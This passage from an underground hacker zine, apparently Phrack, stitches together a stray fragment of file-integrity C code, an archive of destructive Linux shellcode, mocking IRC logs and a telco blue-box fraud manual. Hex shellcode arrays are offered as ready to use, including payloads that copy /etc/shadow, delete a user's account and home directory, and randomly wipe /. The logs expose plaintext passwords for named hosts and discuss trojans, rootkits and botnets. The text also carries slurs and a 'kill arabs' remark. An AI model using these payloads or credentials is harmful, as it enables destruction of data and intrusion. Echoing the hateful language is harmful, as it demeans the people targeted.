pFco2->GetPropSet(); const cFCOPropVector& v1 = pFco1->GetPropSet()->GetValidVector(); const cFCOPropVector& v2 = pFco2->GetPropSet()->GetValidVector(); uint32 result = 0; mInvalidProps.SetSize( v1.GetSize() ); mUnequalProps.SetSize( v1.GetSize() ); mInvalidProps.Clear(); mUnequalProps.Clear(); // finally, comapre all the properties for(int i=0; iGetPropAt(i)->Compare(ps2->GetPropAt(i), iFCOProp::OP_EQ) != iFCOProp::CMP_TRUE) { // they are not equal! mUnequalProps.AddItem(i); result |= PROPS_UNEQUAL; } } } } if( ! result ) result = EQUAL; return result; } ---[STOP CUTTING HERE YOU MORON]----------------------------%<---------------------------------------------- |=[ 0x07 ]=--------------------------------------------------------------=| Evil Shellcodes by The Blackhat Moriaty Here is a nice little archive of ready-to-use Linux shellkodez 4 your perusal. All have been filtered for bad chars and tested in the wild! /* * Opens /dev/audio, reads bytes fro /dev/random and * while they are non-null, writes them to /dev/audio. * * Note: We tested this one on Al Huger. We embedded this inside a gay * porn mpg, which exploited a local vulnerability in xine. Al thought he * was gonna watch Frisky Summer II, but imagine his surprise when this * garbage was heard thru his speakerz instead! */ char sweet_music[] = "\xeb\x0d\x5e\x31\xc9\xb1\x95\x80\x36\x02\x46\xe2\xfa" "\xeb\x05\xe8\xee\xff\xff\xff\x57\x8b\xe7\x55\x54\x51" "\xea\x02\x02\x02\x02\x59\x81\xc1\xf7\x33\xfd\x81\xe6" "\xf2\x8f\xb1\x7c\x02\x02\x02\xba\x07\x02\x02\x02\xbb" "\x03\x02\x02\x02\x8b\xf8\x51\x8b\xf1\xcf\x82\x59\x8b" "\x47\xee\x8f\xb1\x8b\x02\x02\x02\xba\x07\x02\x02\x02" "\x8b\xfb\x51\x8b\xf1\xcf\x82\x59\x88\x57\xf1\x86\xd0" "\x8b\xc5\x8a\x57\xe9\x76\x2a\x8f\x4f\xf1\xb8\x03\x02" "\x02\x02\xbc\x06\x02\x02\x02\x92\xba\x01\x02\x02\x02" "\x51\x8b\xf9\xcf\x82\x59\x8b\xf2\x51\x89\x5f\xee\xcf" "\x82\x59\x82\x7f\xe9\x02\x77\xe4\x8f\x67\xf6\x59\x5c" "\x5d\xcb\xc1\x2d\x66\x67\x74\x2d\x63\x77\x66\x6b\x6d" "\x02\x2d\x66\x67\x74\x2d\x70\x63\x6c\x66\x6d\x6f\x02"; /* * Chmods /sbin/init non-executable and then writes * "logout" to the end of the root user's login * file. * * Note: This idea was borrowed from the infamous seiki ownage log. So, * I guess not terribly original but still a classic in its own right. */ char chmod_logout[] = "\xeb\x0d\x5e\x31\xc9\xb1\x8f\x80\x36\x02\x46\xe2\xfa" "\xeb\x05\xe8\xee\xff\xff\xff\x57\x8b\xe7\x55\x54\x51" "\xea\x02\x02\x02\x02\x59\x81\xc1\xf7\x81\xe6\xf2\x33" "\xf4\x8f\xb9\x6d\x02\x02\x02\xbb\xc2\x03\x02\x02\xba" "\x0d\x02\x02\x02\x51\x8b\xf9\xcf\x82\x59\x8f\xb9\x78" "\x02\x02\x02\xbb\x03\x02\x02\x02\xba\x07\x02\x02\x02" "\x8b\xf0\x51\x8b\xf9\xcf\x82\x59\x8f\x91\x85\x02\x02" "\x02\x8b\xc5\x8b\xd3\xba\x06\x02\x02\x02\xb8\x05\x02" "\x02\x02\x51\x8b\xf9\xcf\x82\x59\xba\x04\x02\x02\x02" "\x51\x8b\xf9\xcf\x82\x59\x8f\x67\xf6\x59\x5c\x5d\xcb" "\xc1\x2d\x71\x60\x6b\x6c\x2d\x6b\x6c\x6b\x76\x02\x2d" "\x70\x6d\x6d\x76\x2d\x2c\x6e\x6d\x65\x6b\x6c\x02\x6e" "\x6d\x65\x6d\x77\x76\x08\x02"; /* * As used in the infamous cryptome.org defacement, * writes "It was bighawk!" to the index.html */ char cryptome[] = "\xeb\x0d\x5e\x31\xc9\xb1\x83\x80\x36\x02\x46\xe2\xfa" "\xeb\x05\xe8\xee\xff\xff\xff\x57\x8b\xe7\x55\x54\x51" "\xea\x02\x02\x02\x02\x59\x81\xc1\xf7\x33\xf4\x81\xe6" "\xf2\x8f\xb9\x5b\x02\x02\x02\xbb\x03\x02\x02\x02\xba" "\x07\x02\x02\x02\x8b\xf0\x51\x8b\xf9\xcf\x82\x59\x8f" "\x91\x70\x02\x02\x02\x8b\xc5\x8b\xd3\xba\x06\x02\x02" "\x02\xb8\x12\x02\x02\x02\x51\x8b\xf9\xcf\x82\x59\xba" "\x04\x02\x02\x02\x51\x8b\xf9\xcf\x82\x59\x8f\x67\xf6" "\x59\x5c\x5d\xcb\xc1\x2d\x74\x63\x70\x2d\x75\x75\x75" "\x2d\x6a\x76\x6f\x6e\x2d\x6b\x6c\x66\x67\x7a\x2c\x6a" "\x76\x6f\x6e\x02\x4b\x76\x22\x75\x77\x78\x22\x40\x6b" "\x65\x6a\x63\x75\x69\x23\x08\x02"; /* * Copies /etc/shadow over the top of /etc/issue * * Note: Pure fun... this never gets old */ char we_have_issues[] = "\xeb\x0d\x5e\x31\xc9\xb1\xc3\x80\x36\x02\x46\xe2\xfa" "\xeb\x05\xe8\xee\xff\xff\xff\x57\x8b\xe7\x55\x54\x51" "\xea\x02\x02\x02\x02\x59\x81\xc1\xf7\x33\xd0\x81\xe6" "\xf2\x8f\xb9\xae\x02\x02\x02\xba\x07\x02\x02\x02\x8b" "\xd3\x51\x8b\xf9\xcf\x82\x59\x8b\xc5\x8f\xb1\xba\x02" "\x02\x02\xbb\x03\x02\x02\x02\xba\x07\x02\x02\x02\x51" "\x8b\xf1\xcf\x82\x59\x8b\xc4\x8f\x8f\xea\xf9\xfd\xfd" "\xb8\x02\x06\x02\x02\xba\x01\x02\x02\x02\x51\x8b\xf9" "\xcf\x82\x59\x87\xc2\x8b\x87\xd6\xf9\xfd\xfd\x7c\x2c" "\x8f\x74\x02\xba\x06\x02\x02\x02\x89\x97\xd6\xf9\xfd" "\xfd\x51\x8b\xf1\xcf\x82\x59\xba\x01\x02\x02\x02\xb8" "\x02\x06\x02\x02\x51\x8b\xf9\xcf\x82\x59\x87\xc2\x8b" "\x87\xd6\xf9\xfd\xfd\x7d\xd7\xbb\x04\x02\x02\x02\x8b" "\xca\x51\x8b\xf9\xcf\x82\x59\x8b\xca\x51\x8b\xf1\xcf" "\x82\x59\x8f\x67\xf6\x59\x5c\x5d\xcb\xc1\x2d\x67\x76" "\x61\x2d\x71\x6a\x63\x66\x6d\x75\x02\x2d\x67\x76\x61" "\x2d\x6b\x71\x71\x77\x67\x02": /* * Removes jobe's entries from /etc/[passwd/shadow] * then rm's /home/jobe */ char joberm[] = "\x52\x8e\xe2\x50\x51\x54\xef\x07\x07\x07\x07\x5c\x84" "\xc4\xf2\x8a\x8c\x41\x05\x07\x07\x86\xeb\x4b\x03\x07" "\x07\x8a\xbc\x49\x05\x07\x07\x8e\x8a\xdf\xfc\xf8\xf8" "\x8a\xb4\x55\x05\x07\x07\x8a\x8c\x5a\x05\x07\x07\x8e" "\x8a\xd3\xfc\xf8\xf8\x84\xe3\xf7\x36\xd5\x8e\xba\xdb" "\xfc\xf8\xf8\x8e\xb2\xe7\xfc\xf8\xf8\xc0\x82\xe3\xfc" "\xf8\xf8\x07\x07\x07\x07\xbe\x05\x07\x07\x07\xbf\x02" "\x07\x07\x07\x54\x8c\x9a\xd3\xfc\xf8\xf8\xca\x87\x5c" "\x8e\xc0\x8a\x84\x6e\x05\x07\x07\x8e\x82\xd7\xfc\xf8" "\xf8\xbe\x46\x07\x07\x07\xbd\xc7\x06\x07\x07\xbf\x02" "\x07\x07\x07\x54\x8c\x9a\xd7\xfc\xf8\xf8\xca\x87\x5c" "\x8e\x82\xb7\xfc\xf8\xf8\x8a\x82\xef\xfc\xf8\xf8\x8e" "\x82\xbb\xfc\xf8\xf8\x8e\x82\xcb\xfc\xf8\xf8\xbd\x07" "\x03\x07\x07\xbf\x04\x07\x07\x07\x8c\x8a\xbb\xfc\xf8" "\xf8\x54\x8e\xfc\xca\x87\x5c\x82\xc7\x8e\x82\xb3\xfc" "\xf8\xf8\x73\x66\x8c\x82\xef\xfc\xf8\xf8\x8e\x82\xab" "\xfc\xf8\xf8\xb9\x04\x07\x07\x07\x86\xba\xab\xfc\xf8" "\xf8\x6d\x68\x65\x62\x73\x1c\xbf\x03\x07\x07\x07\x8c" "\x8a\xcb\xfc\xf8\xf8\x8c\x92\xb3\xfc\xf8\xf8\x54\x8c" "\x9a\xb7\xfc\xf8\xf8\xca\x87\x5c\x8c\x82\xbb\xfc\xf8" "\xf8\x8e\x82\xcb\xfc\xf8\xf8\x8c\x8a\xbb\xfc\xf8\xf8" "\x8e\xf7\xbd\x07\x03\x07\x07\x54\x8e\xfc\xca\x87\x5c" "\x82\xc7\x8e\x82\xb3\xfc\xf8\xf8\x72\xb7\xb9\x01\x07" "\x07\x07\x8e\xf7\x54\x8e\xfc\xca\x87\x5c\x8e\xf7\x54" "\x8c\x9a\xb7\xfc\xf8\xf8\xca\x87\x5c\x8c\x8a\xd3\xfc" "\xf8\xf8\xbf\x21\x07\x07\x07\x54\x8c\x9a\xd7\xfc\xf8" "\xf8\xca\x87\x5c\x8a\x94\x71\x05\x07\x07\x36\xce\xb8" "\x02\x07\x07\x07\x8e\x92\xc3\xfc\xf8\xf8\x8e\xff\x8e" "\xcd\x54\x8c\x9a\xc3\xfc\xf8\xf8\xca\x87\x5c\x8e\xc1" "\xbe\x46\x07\x07\x07\xbd\xc7\x06\x07\x07\x8e\xff\x54" "\x8c\x9a\xd7\xfc\xf8\xf8\xca\x87\x5c\x8e\xc0\x8c\x8a" "\xbb\xfc\xf8\xf8\xbd\x07\x03\x07\x07\xbf\x04\x07\x07" "\x07\x54\x8e\xf4\xca\x87\x5c\x82\xc7\x8e\x82\xb3\xfc" "\xf8\xf8\x73\x4b\x8c\x82\xef\xfc\xf8\xf8\x8e\x82\xab" "\xfc\xf8\xf8\x8a\x71\x07\x86\xba\xab\xfc\xf8\xf8\x6d" "\x68\x65\x62\x73\x16\xbf\x03\x07\x07\x07\x8c\x92\xb3" "\xfc\xf8\xf8\x54\x8e\xfc\xca\x87\x5c\x8c\x8a\xbb\xfc" "\xf8\xf8\xbf\x04\x07\x07\x07\xbd\x07\x03\x07\x07\x54" "\x8e\xf4\xca\x87\x5c\x82\xc7\x8e\x82\xb3\xfc\xf8\xf8" "\x72\xc4\xbe\x01\x07\x07\x07\x8e\xcf\x54\x8e\xf4\xca" "\x87\x5c\x8e\xcf\x54\x8e\xfc\xca\x87\x5c\x8c\x8a\xc3" "\xfc\xf8\xf8\xbf\x21\x07\x07\x07\x54\x8c\x9a\xd7\xfc" "\xf8\xf8\xca\x87\x5c\x8a\x8a\xdf\xfc\xf8\xf8\x36\xd5" "\xbf\x0c\x07\x07\x07\x54\x8c\x9a\xdf\xfc\xf8\xf8\xca" "\x87\x5c\x8a\x62\xf3\x5c\x59\x58\xce\xc4\x28\x65\x6e" "\x69\x28\x75\x6a\x07\x2a\x75\x61\x07\x28\x6f\x68\x6a" "\x62\x28\x6d\x68\x65\x62\x07\x28\x62\x73\x64\x28\x77" "\x66\x74\x74\x70\x63\x07\x28\x73\x6a\x77\x28\x29\x6d" "\x68\x65\x62\x75\x6a\x07\x28\x62\x73\x64\x28\x74\x6f" "\x66\x63\x68\x70\x07": /* * Reads a single byte from /dev/random, if it's * 0x0 then rm's / * * Note: The shellcode version of phrack.efnet.ru's own * hacker russian roulette. */ char randrm[] = "\xeb\x0d\x5e\x31\xc9\xb1\x86\x80\x36\x02\x46\xe2\xfa" "\xeb\x05\xe8\xee\xff\xff\xff\x57\x8b\xe7\x55\x54\x51" "\xea\x02\x02\x02\x02\x59\x81\xc1\xf7\x81\xee\x3e\x8f" "\x7f\xca\x8f\xb1\x02\x02\x02\x02\xfe\xbb\x07\x02\x02" "\x02\x8b\x7f\xbe\x81\xe6\xf2\xf1\xa7\xba\x07\x02\x02" "\x02\x8f\xb9\x02\x02\x02\x02\x33\xd0\x51\x8b\xf9\xcf" "\x82\x59\x8f\x57\xc5\x8b\x57\xc2\x8b\xc5\xb8\x03\x02" "\x02\x02\xba\x01\x02\x02\x02\x89\x4f\xc2\x51\x8b\xf9" "\xcf\x82\x59\x82\x7f\xc5\x02\x77\x13\xba\x09\x02\x02" "\x02\x89\x4f\xbe\x33\xd0\x51\x89\x5f\xca\xcf\x82\x59" "\x8f\x67\xf6\x59\x5c\x5d\xcb\xc1\x2d\x60\x6b\x6c\x2d" "\x70\x6f\x02\x2f\x70\x64\x02\x7c\x02\x2d\x02"; |=[ 0x08 ]=--------------------------------------------------------------=| Really Dangerous Cisco Shit Released by FX if the w0rld g4sped w/ anticipation when the legendary dvdman made a subtle r3f3r3nc3 2 hiz c1sq0 rem0te shell penetration t00l on irc, and the logz were published 4 all, that wuz nothing compared to the widespr34d p4n1c th@ f0llowed phen0elitz new shit. apparently, there iz a 2 GB s1gned 1nteger 0verflow in cisc0 routerz!!!!!! let'z view the approximate timeline 4 phen0elitz development of this expl0it: Jan 5. 3PM finish reading thru ios 11.3 src code 4 the day 4PM contact the 15 person phen0elit art team 4.5PM fritzie calls back with a great idea for an 'exploit name' 4.6PM holgar iz w0rking on the ascii banner, wilhelm is making the t-shirt Jan 6. 10AM prepare to see if the vulnerability is exploitable, write POC 11AM start sending 2gb of data to the r0uter on the lokal NET 8PM end of specially crafted data arrives @ r0uter Jan 7- 11AM start sending daily 2 gb Feb 25 8PM 0h b0y 0 b0y! my r0uter finally cr4shed 2day! l3mm3 r3ad l0gz Feb 26 8PM 1t w0rked! n0w 1 n33d 2 sk4n th3 n3t & f1nd an0ther r0uter s0mewhere runn1ng the exact same i0s vers10n 0n the s4me ch1ps3t, w1th the same number of open s0cketz, & with the exact same dev1c3z Mar 8 2PM g0t it! Mar 8 3PM try rem0te exploit! Jul 20 5AM w0w! my wh0le packet finally arrived, 1t w0rkd! n0w letz have fun w/ th1z k0rean r0uter until the adm1n getz b4ck fr0m falun g0ng & findz h1z c0nf1g is m1ss1ng Jul 20 7AM sent advis0ry out 2 dave ahmad |=[ 0x09 ]=--------------------------------------------------------------=| The Defcon Review by phr4k st4ff s0, this yearz defcon really suqd, even m0re than all the onez in recent mem0ry. well, it could have been worse, phrack staff could have been stranded at s0me place like CCC, with a bunch of y0deling european haqr fagg0tz with roq-climbing bakpakz & bootz & green sh0rtz & suspenderz listen1ng 2 dav1d hasselh0ff tapez while stealth talkz about the new pr0cfs function he f0und and hendy playz w1th h1z sh0elaces.... so what did u miss if u werent @ defc0n? h0pefully a lizt will b eazier than thiz dial0gue f0rm@: o crispin c0wan o haz a phd o teachez a few intro 2 os coursez @ oregon inst. of tech or smtg. o also writes "secure" software o agreed that he "fucked up" when his immunix stackguard th1nk t4nk decided 2 plaze the c4n4ry 0n the st4q betw33n the fr4me p0inter & the st4ck p0inter o wuz @ defk0n hakn it up with hiz companyz ctf team o stayed in vegas for a week, but didnt stop playing ctf o somehow, 20 d00dz from immunix got paid 2 go 2 vegas 2 play ctf?? o immunix l0st ctf o kev1n m1tnick o the c0nd0r wuz wandering ar0und defk0n like an austistic kid inside the myst3ry fun h0uze o tr1ed tlaking 2 him but apparently he wuznt 2 happy cuz we w3r3 th3 0nly ppl th3r3 th@ werent try1ng 2 kizz h1z azz o rej3kted 0ur 0fferz 2 g1ve h1m the upd8d k0py 0f jsz's m41lsp00lz o w1nn schw4rt4u o st1ll f@ & bl04t3d o s0me n4sty 4ss ch1x d01ng h4qr je0pardy o 4sk3d s0me krazy tekn1k4l quest10nz l1ke "what does the n0p instrukt10n d0 in ass3mbly?" & thus b4ffl3d the kr0wd o l4nce sp1tzc0q o n0t really sure 4b0ut th1z 0n3 o l3ft 4ft3r day1 becuz 0f 4ll the h4rr4ssm3nt... h4h4h4h! o n30nfr30n o we h4d n0 idea wh0 th1z guy wuz unt1l s0meb0dy sh0uted: "hey rnt u ne0nfre0n fr0m und3rn3t?!?!?!?!" o p4ck3t f41ry o the highl1te 0f every defk0n, wuz h3r3 th1z year 2! o th1z y34r wearing leather ch4pz 0ver kut0ff st0new4sh3d j34nz o h4ck3r d14r13z o sp0ttd 2 memberz 0f th1s l3g3nd4ry s4g4 o hd m00re, beam1ng 4ft3r h1s r1pp3d xf0cus dc0m rel34s3 o s4w 4nn4 m00r3 (4k4 st4rl4 pur3h34rt), th0ught sh3 w4z a d00d @1st o h4x0r g1rlz o p0rn0graph1c f1lmz w1th g1rlz simultane0uzly str1ppn/us1ng nmap o def1n1tely the 0nly t1me ull hear 'fy0d0r' and 'pussy' in the same p4r4gr4ph o th3z3 g1rlz were 2 nause4t1ngly disgust1ng 2 fuq, & bes1d3z we r4n 0ut 0f 0ur preskr1pt0n 4 v4ltr3x, s0 the 0nly pers0n br4v3 en0ugh 2 get a p4rty f4v0r 0ut 0f the d34l wuz tr4shk4n m4n DISCLAIMER: 1m n0t sure h0w funny th1z wuz, pr0bably n0t @ all becuz th3r3 really wuz n0th1ng 2 rep0rt. DC 12 sh0uld be a l0t m0re fun, j01n us th3r3 w3r3 g0nna k0mm1t mass su1c1de! |=[ 0x0a ]=--------------------------------------------------------------=| A Pr0ix IRC Medley by the b1g leb0wsk1 EDITORS NOTE: We continued this exhilarating piece here, at the end of Linenoise just because of its sheer immense volume. This piece was also submitted much later by the author, who had to actually create a specialized log cutting program that made use of the Boyer-Moore fast string searching algorithm, to find the most interesting snippets from gigabytes of pr0ix irc logs. Ever wanted access to hack.co.za ? [26 Aug/05:42am] (pr0ix) i have a static ip where im coming from [26 Aug/05:43am] ok [26 Aug/05:43am] (pr0ix) 195.254.225.135 source [26 Aug/05:43am] host: hack.co.za [26 Aug/05:43am] user: m0rkus [26 Aug/05:43am] pass: d0rkus [26 Aug/05:44am] (pr0ix) k /*************************************************/ Or @ on #darknet ? [10 Aug/12:28pm] -Mengele- Congradulations pr0ix! [10 Aug/12:28pm] -Mengele- dvdman has given you Ops with flags o on #darknet. [10 Aug/12:28pm] -Mengele- Please set a password: /msg Mengele pass [10 Aug/12:28pm] -Mengele- where is your selected password. [10 Aug/12:28pm] -Mengele- You can get ops by: /msg Mengele op [11 Aug/01:24am] (pr0ix) pass fuckm3h4rd! [11 Aug/01:24am] -Mengele- Password set to: 'fuckm3h4rd!'. [20 Aug/01:58am] -Mengele- Your flags have been upgraded to o on #darknet. /*************************************************/ Me me me me me !!!! [6 Aug/01:59am] @ Topic by pr0ix: if anyone is interested to make a botnet /msg pr0ix /*************************************************/ And so do we!!! [2 Sep/02:45am] (pr0ix) i have enough log's from different places to get you busted [2 Sep/02:46am] umm.... /*************************************************/ Anyone want CANVAS?, thanx dvdman !! [11 Aug/02:40am] http://codes.dvdman.ws/warez/CANVAS [11 Aug/02:41am] (pr0ix) whats that? [11 Aug/02:42am] david aidels canvas [11 Aug/02:42am] its a exploit thingy /*************************************************/ Its one of lifes mysteries ! [22 Aug/02:23am] (pr0ix) btw how the fuck can i sniff ftp passwords with tcpdump? [22 Aug/02:46am] (pr0ix) explain me howto sniff with tcpdump [22 Aug/02:47am] tcpdump -lnettts 1600 -Xw tcpdump.out & tail -f tcpdump.out [22 Aug/02:47am] hmm [22 Aug/02:47am] that should work /*************************************************/ Chiqz fuck for shellcode ?!?! [5 Sep/08:19am] damn they didn't post zacode.c .. prolly banner was too lame even though the 21b shellcode worked.... eheheh ill prolly not b able to eat her pussyt now [5 Sep/08:19am] (pr0ix) why do you care? [5 Sep/08:20am] (pr0ix) who is that chick? [5 Sep/08:20am] cuz she was willing to fuck me =P [5 Sep/08:20am] eheheh she's not even that hot actually /*************************************************/ Someone send pr0ix a copy of "Shell scripting for dummies" [4 Aug/03:03am] (pr0ix) hmm listen, i have a small problem where you can help me [4 Aug/03:03am] sup? [4 Aug/03:03am] (pr0ix) i have some files in a directory like 20030701_syslog.log 20030702_syslog.log etc etc [4 Aug/03:03am] yeah [4 Aug/03:03am] (pr0ix) i want to cat every single file and grep -i for DISCONNECT and write it do date.log [4 Aug/03:04am] (pr0ix) i mean: cat 20030701_syslog.log|grep -r DISCONNECT >20030701.logs [4 Aug/03:04am] (pr0ix) how to automate this? [4 Aug/03:04am] (pr0ix) cat 20030702_syslog.log|grep -r DISCONNECT >20030702.logs [4 Aug/03:04am] (pr0ix) etc etc /*************************************************/ Yes, that truly would be the best. It sounds very feasible too! [8 Sep/03:12am] what kind of trojan do you need? [8 Sep/03:12am] (pr0ix) ssh [8 Sep/03:12am] (pr0ix) best would be all in one SSH/INETD/APACHE+sniffer [8 Sep/03:13am] (pr0ix) even a rootkit would do the job, it has to be private, everything else gets detected /*************************************************/ You've only just realised ?? [4 Aug/02:53pm] (pr0ix) wait wait :P [4 Aug/02:54pm] (pr0ix) i have 0 clue.. /*************************************************/ Don't we? [7 Aug/09:07am] (pr0ix) 1] you don't even know from what fucking place on the earth i come from [7 Aug/09:07am] (pr0ix) 2] you have zero clue what networks i admin [7 Aug/09:07am] (pr0ix) 3] you dont know what and where i work /*************************************************/ Opers abusing their status? tututut [8 Sep/07:32am] (pr0ix) do me a favour /stat jaf [8 Sep/07:33am] /stat l? [8 Sep/07:33am] (pr0ix) yeah [8 Sep/07:33am] (pr0ix) no even [8 Sep/07:33am] (pr0ix) just /stat jaf [8 Sep/07:34am] /stat is an ambiguous command, /stats jaf shows nothing [8 Sep/07:34am] /stats l gives ... irc.choopa.net jaf[~jaf@phrack.com.br] 0 2740 160 1707 54 :31847 3 - [8 Sep/07:34am] (pr0ix) hmm [8 Sep/07:34am] (pr0ix) you are global O ? [8 Sep/07:34am] yup [8 Sep/07:38am] (pr0ix) ok we found it [8 Sep/07:38am] (pr0ix) [blane(blane@oper.efnet.demon.co.uk)] unknown@193.99.135.162 is not valid for the account specified [8 Sep/07:38am] (pr0ix) thx anyways [8 Sep/07:38am] (pr0ix) found the real ip [8 Sep/07:39am] (pr0ix) fuck that is blane's work ip [8 Sep/07:42am] the ip isn't 140.164.30.200? [8 Sep/07:43am] (pr0ix) no [8 Sep/07:43am] (pr0ix) do: /dns 140.164.30.200 [8 Sep/07:43am] try asking someone on choopa? [8 Sep/07:43am] (pr0ix) everyone idle [8 Sep/07:44am] ... irc.choopa.net jaf[~jaf@198.169.185.135] 0 2848 167 1754 55 :32461 8 - [8 Sep/07:44am] /stats L jaf [8 Sep/07:44am] (pr0ix) great thank you [8 Sep/07:44am] (pr0ix) great great [8 Sep/10:13am] (pr0ix) hmm can you /stat jaf again? [8 Sep/10:15am] ... irc.secsup.org jaf[~jaf@198.169.185.135] 0 382 26 162 4 :2534 0 - /*************************************************/ Thanks ! [20 Aug/10:57am] (pr0ix) ssh reptile.cube11.net -p 2222 -l lsd [20 Aug/10:57am] (pr0ix) pass ist try2fix! [20 Aug/11:48am] (pr0ix) reptile.cube11.net 2222 panther/!changeme /*************************************************/ pr0ix aka z3r0c00l !! [5 Sep/03:16am] dood.. you have no idea what you are talking about.. your technical knowledge is VERY limited.. [26 Aug/10:10am] (pr0ix) ja fuck with the bes, die like the rest /*************************************************/ pr0ix repeating... [4 Sep/08:07am] well, nothing really.. playing with linux kernel 2.6 [4 Sep/08:07am] hooking systemcalls through dma [4 Sep/08:07am] quite nice [4 Sep/08:07am] (pr0ix) interesting.. got some new warez? [4 Sep/08:07am] (pr0ix) greets [4 Sep/08:08am] (pr0ix) listen is it possible to hook systemcalls trough dma? [4 Sep/08:11am] i have absolutely no idea whatsoever :) /* Lol, it doesn't stop there ! Does anyone actually think pr0ix even knows what an off by one is? */ [4 Sep/08:09am] (pr0ix) rumours about a OpenBSD ftpd off by one are going around [4 Sep/08:10am] heared that, they said the bug is in the MKDIR routine, I went through it, no offbyone bug there, no noth ing. [5 Sep/02:57am] (pr0ix) hmm [5 Sep/02:58am] (pr0ix) heared that, they said the bug is in the MKDIR routine, I went through it, no offbyone bug there, no nothing [5 Sep/02:58am] (pr0ix) maybe you found something else [5 Sep/02:58am] realpath [5 Sep/02:58am] (pr0ix) sftp or ftpd? /*************************************************/ pr0ix gets tough!.. [11 Aug/01:43am] (pr0ix) i dont even know "mrdivide" i dont like kidz at all [11 Aug/01:44am] mrdivide owns the botnet that is currently controling #darknet [11 Aug/01:44am] im not a kid [11 Aug/01:44am] (pr0ix) watch your mouth if you want to stay and dont fuck with people you don't know. [8 Sep/07:48am] (pr0ix) listen, just a advice from me, stop playing with CNR's reverse Zone's [8 Sep/07:48am] (pr0ix) just a advice [8 Sep/07:48am] what is CNR's ? [8 Sep/07:48am] (pr0ix) you know what i mean [8 Sep/08:01am] (pr0ix) you little fag, what makes you think i own that box? [8 Sep/08:01am] (pr0ix) and i think the biggest kid are you [8 Sep/08:02am] nah [8 Sep/08:02am] im l33t, you not [26 Aug/03:12am] its childish [26 Aug/03:12am] (pr0ix) you can feel lucky, belive me he's able to take out your whole ISP's backbone.. [26 Aug/03:12am] (pr0ix) yeah why not, i could kill your isp [26 Aug/03:07am] (pr0ix) you are a clueless fag [26 Aug/03:07am] (pr0ix) you keep fucking with my friends [26 Aug/03:07am] how so ? [26 Aug/03:07am] (pr0ix) i dont want you in #darknet so fuck off /*************************************************/ pr0ix starts his own pr0j3ct m4yh3m [31 Aug/11:46am] (pr0ix) yeah, heh i started a new project, "no justice - no peace - kill arabs" [31 Aug/11:50am] (pr0ix) soon i will be able to toggle the internet in every arab country, sounds strange and gay but its true [31 Aug/11:53am] I hope so :) [31 Aug/11:57am] (pr0ix) no shit, it will even affect the big oil companies /*************************************************/ ROFL [7 Aug/09:02am] who knows maybe u did get haxed [7 Aug/09:03am] (pr0ix) haha never /*************************************************/ At least pr0ix laughs at his own lameness [8 Sep/08:22am] <[RaFa]> many people told me your skilled [8 Sep/08:22am] (pr0ix) *lol* /*************************************************/ I wonder what goodies are on dvdmans home box? [22 Aug/02:25am] ssh 208.59.134.110 [22 Aug/02:25am] login = pr0ix [22 Aug/02:25am] pw = temp /*************************************************/ |=[ 0x0b ]=--------------------------------------------------------------=| Project Honeynet Enumeration by anonymous Phrack High Council Member Well we all know about the HoneyNet project. (www.honeynet.org for l4merz) They catch hackers by luring you in with the appearance of exploitability, record all your traffic with Snort and Sebek (their vlogger ripoff), then steal all your 0day, and abuse it for creepy whitehat purposes. Like, say, publishing the code on bugtraq. Or having Lance pretend to understand it. Or put it in the hands of any other narc/spook in the business of selling out their souls. Do not despair kiddies! The tables are turning. PHC Enterprises , LTD, a subsidiary of Phrack Magazine Corp., has developed a highly efficient, multithreaded, self-replicating, highly agressive packet scanner capable of identifying honeypots in the wild. Enter HONEYSCAN.C!!@@#$%^ HONEYSCAN: "Stickier than rloxely's keyboarD!" HONEYSCAN: "More tricks than a vegas hooker!" HONEYSCAN: "Smokes the crack!" The advanced crack-smoking techniques used in this scanner will not be disclosed at the present time, at the request of PHC Labs/ Research division. Testing is ongoing. However, if honeypots or honeynets are ever deployed... AHEM, uhh anywhere at all really, you can rest assured that PHC Enterprises will altert YOU, the PHRACK consumer, of the presence of honeypots on the Internet. As a token of our gratidude for your continued patronage of the true underground scene, we would like to present a list of honeypots, for recreational packeting purposes. DRUMROLL< PLEASE RECREATIONALLY PACKET THESE BOXES!@#$% RLOXLEY THIS MEANS YOU. 141.211.133.240 141.211.133.241 141.211.133.242 141.211.133.243 |=[ 0x0c ]=--------------------------------------------------------------=| Sebek Sucks by Chris Spencer /* * Copyright (C) 2002, 2003 ISS Inc. * All Rights Reserved. * * THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ISS * The copyright notice above does not evidence any * actual or intended publication of such source code. * * This code can be very dangerous if put in the wrong hands. * Do not distribute. * * This piece of warez lets you go unlogged on sebek-enabled honeypots. * */ #include #include int main (int argc, char **argv) { int l; char *p, buf[1024]; while (fgets (buf, sizeof (buf) - 1, stdin)) { l = strcspn (buf, "\r\n"); buf[l] = '\0'; if (!strcmp (buf, "exit") || !strcmp (buf, "logout")) { exit (0); } else if (!strncmp (buf, "cd", 2)) { p = strrchr (buf, ' '); if (!p) continue; chdir (p + 1); } else { system (buf); } } } |=[ 0x0d ]=--------------------------------------------------------------=| Bluebox Infoz by tr4shc4n m4n Yo yo- |=----------------------------------------------------------------------=| How many times have you been hanging around on IRC when some moron goes off about BlueBoxing, and the threat it poses. (See #2600/#hackphreak/#cdc/#pla <- theze guys are the worst. ) Well for this issue we decided to dump something found in the trash a few years ago by one of our S3kr3t 4g3ntz. Thanks to this document the textfile knowledge of a generation of overwieght wannabe vampire hackers ( yo werd 2 the DoC ) will be eradicated. Yo propz to liveevil - where you @ bro!@#!@#!@#!@#!@#. PS. SOMEONE PLZ GIVE US A FUCKING SCANNER THIS SHIT IS HARD AS FUCK TO RETYPE!! Contents Introduction 1-1 Description 2-1 Testing for fraudulent calls 2-3 Recording fraudulent calls 2-5 Disposing of fraudulent calls 2-5 Cut the call 2-5 Continue the call 2-5 Operational measurements 3-1 User interface 4-1 Commands 4-1 Alarms 4-4 Logs 4-4 List of terms 5-1 List of figures Figure 2-1 Fraudulent call setup 2-1 Figure 2-2 Fraudulent call system response 2-2 Figure 2-3 Reserved multifrequency receiver 2-3 List of tables Table 2-1 MFR attachment response 2-4 Table 3-1 Blue box fields 3-1 Table 4-1 Log description 4-5 Blue Box Fraud Detection Feature Description BCS22 and up 1-1 Introduction This document describes the Blue Box Fraud Detection feature and its operation within the DMS-100 Family. A .blue box. is any device, connected illegally to a subscriber.s line, that can produce both a 2600 Hz tone and multifrequency (MF) digits. To place a fraudulent call, the perpetrator performs two steps: 1 The perpetrator uses a normal telephone to place a normal call. This call is usually a free or inexpensive call, and uses a Single Frequency (SF) trunk beyond the perpetrator.s billing office. 2 The perpetrator uses a blue box to place the fraudulent call. This call uses the SF trunk seized for the original, normal call. The perpetrator.s billing office typically does not detect calls placed with a .blue box., thus the 